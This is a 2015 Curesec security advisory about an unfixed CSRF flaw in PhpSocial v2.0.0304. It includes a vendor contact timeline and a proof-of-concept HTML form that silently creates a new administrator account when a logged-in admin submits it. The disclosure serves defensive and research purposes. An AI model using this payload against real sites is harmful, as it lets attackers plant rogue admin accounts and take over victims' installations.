Security Advisory - Curesec Research Team
1. Introduction
Affected Product:PhpSocial v2.0.0304_20222226
Fixed in:not fixed
Fixed Version Link:n/a
Vendor Webite: http://phpsocial.net
Vulnerability Type:CSRF
Remote Exploitable:Yes
Reported to vendor:11/21/2015
Disclosed to public:12/21/2015
Release mode:Full Disclosure
CVE: n/a
CreditsTim Coen of Curesec GmbH
2. Overview
CVSS
Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P
Description
PhpSocial is a social networking software written in PHP. In version v2.0.0304,
it does not have CSRF protection, which means that an attacker can perform
actions for a victim,if the victim visits an attacker controlled site while
logged in.3. Proof of Concept
Add a new admin:<html><body><form action="http://localhost/PhpSocial_v2.0.0304_20222226/cms_phpsocial/admin/AdminAddViewadmins.php" method="POST"><inputtype="hidden" name="admin_username" value="admin2"/><inputtype="hidden" name="admin_password" value="admin"/><inputtype="hidden" name="admin_password_confirm" value="admin"/><inputtype="hidden" name="admin_name" value="admin2"/><inputtype="hidden" name="admin_email" value="admin2@example.com"/><inputtype="hidden" name="task" value="addadmin"/><inputtype="submit" value="Submit request"/></form></body></html>4. Solution
This issue was not fixed by the vendor.5. Report Timeline
11/21/ Contacted Vendor (no reply)201512/10/ Tried to remind vendor (no email is given, security@phpsocial.net does
2015not exist,and contact form could not be used because the website is
down)12/21/ Disclosed to public
2015
Blog Reference:
https://blog.curesec.com/article/blog/PhpSocial-v200304-CSRF-133.html
--
blog:https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-2413089 Berlin, Germany
